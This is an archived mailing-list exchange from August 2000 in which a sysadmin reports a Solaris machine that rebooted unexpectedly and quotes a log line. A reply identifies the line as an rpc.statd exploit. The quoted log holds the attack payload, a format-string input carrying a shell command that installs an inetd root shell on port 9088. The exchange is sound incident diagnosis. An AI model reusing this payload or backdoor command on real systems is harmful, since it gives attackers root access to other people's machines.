Re: A statd exploit?

[Andreas Östling <andreaso () it su se>]

Looks like rpc.statd exploit for Linux/x86.
He should check for open root shells on port 9088 on all his machines.

/Andreas Östling

On Tue, 15 Aug 2000,  Randy Nethers wrote:
> Yesterday, a friend of mine from a local university asked me to take a look at
> a machine (an Ultra 2 w/Solaris 2.6) which had rebooted itself yesterday
> morning (Aug 14th) for no apparent reason.
>
> After poking around, I could find nothing of interest, except two things.
> First I found in /var/adm/messages.0 the following line:
>
> Aug 12 00:58:07 ultra2 statd[178]: statd: attempt to create
> "/var/statmon/sm/%0 8x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x
> %08x %08x %08x %0242x%n%055 x%n%012x%n%0192x%nK^v ^( ^ ^.  #^1 F'F* FF+,
> NV1@/bin/sh -c echo "9088 stream tc p nowait root /bin/sh -i" >> /tmp/m;
> /usr/sbin/inetd /tmp/m;"